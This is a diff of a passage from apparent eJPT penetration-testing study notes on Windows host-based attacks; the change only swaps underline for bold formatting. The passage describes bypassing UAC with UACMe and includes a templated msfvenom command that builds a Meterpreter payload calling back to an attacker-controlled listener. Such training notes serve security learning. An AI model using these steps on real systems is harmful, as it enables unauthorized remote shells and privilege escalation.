jtr0000/eJPT-Notes/6 - System_Host Based Attacks/System_Host Based Attacks.md

 In the shell session, you'll receive an "`System error 5 has occured.
 Access is denied` " since we'd need to respond to the UAC consent prompt which can't be done through the shell unless you bypass UAC.

 ---
-2. <u>Create the metepreter payload with msfvenom and start a listener with multi handler</u>: We're creating the msfvenom payload because the initial Meterpreter session may lack high privileges or is unstable.
+2. **Create the metepreter payload with msfvenom and start a listener with multi handler**: We're creating the msfvenom payload because the initial Meterpreter session may lack high privileges or is unstable.
 Running the payload with UACMe will elevate the meterpreter session's privileges, ensuring the new payload establishes a fully privileged and hopefully more stable session.
 ```
 msfvenom -p payload LHOST=atk_machine LPORT=l_port -f file_type > file_name
 ```